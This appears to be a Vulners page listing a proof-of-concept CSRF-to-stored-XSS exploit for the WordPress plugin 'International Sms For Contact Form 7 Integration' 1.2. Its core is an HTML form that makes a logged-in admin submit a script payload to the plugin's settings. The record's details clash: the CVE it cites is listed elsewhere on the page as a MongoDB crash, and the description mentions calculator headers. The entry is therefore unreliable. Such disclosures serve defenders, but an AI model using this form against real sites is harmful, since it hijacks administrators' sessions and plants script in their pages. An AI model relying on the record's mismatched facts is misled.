| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| CVE-2022-24272 | 21 Apr 202217:19 | – | attackerkb | |
| CVE-2022-24272 | 21 Apr 202214:26 | – | circl | |
| WordPress plugin cf7-international-sms-integration 代码注入漏洞 | 14 Feb 202200:00 | – | cnnvd | |
| CVE-2022-24272 | 21 Apr 202210:45 | – | cve | |
| CVE-2022-24272 MongoDB Server (mongod) may crash in response to unexpected requests | 21 Apr 202210:45 | – | cvelist | |
| CVE-2022-24272 | 21 Apr 202210:45 | – | debiancve | |
| EUVD-2022-29179 | 3 Oct 202520:07 | – | euvd | |
| MongoDB Server (mongod) may crash in response to unexpected requests | 11 May 202200:00 | – | mongodb | |
| CVE-2022-24272 | 21 Apr 202211:15 | – | nvd | |
| BIT-MONGODB-2022-24272 MongoDB Server (mongod) may crash in response to unexpected requests | 6 Mar 202410:57 | – | osv |
# Exploit Title: WordPress Plugin International Sms For Contact Form 7 Integration V1.2 - Cross-Site Request Forgery (CSRF)
# Author: Milad Karimi
# Software Link: https://wordpress.org/plugins/cf7-international-sms-integration/
# Version: 1.2
# Tested on: Windows 11
# CVE: CVE-2022-24272
1. Description:
The plugin International Sms For Contact Form 7 Integration for class-sms-log-display.php and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers.
Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue
2. Proof of Concept:
<form method="post" action="https://example.com/cf7-international-sms-integration/includes/admin/class-sms-log-display.php?page=">
<input type="text" value="<script>alert(1)</script>" name="fcw[fcw_heading]">
<input type="submit" value="Save" name="submit">
</form>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation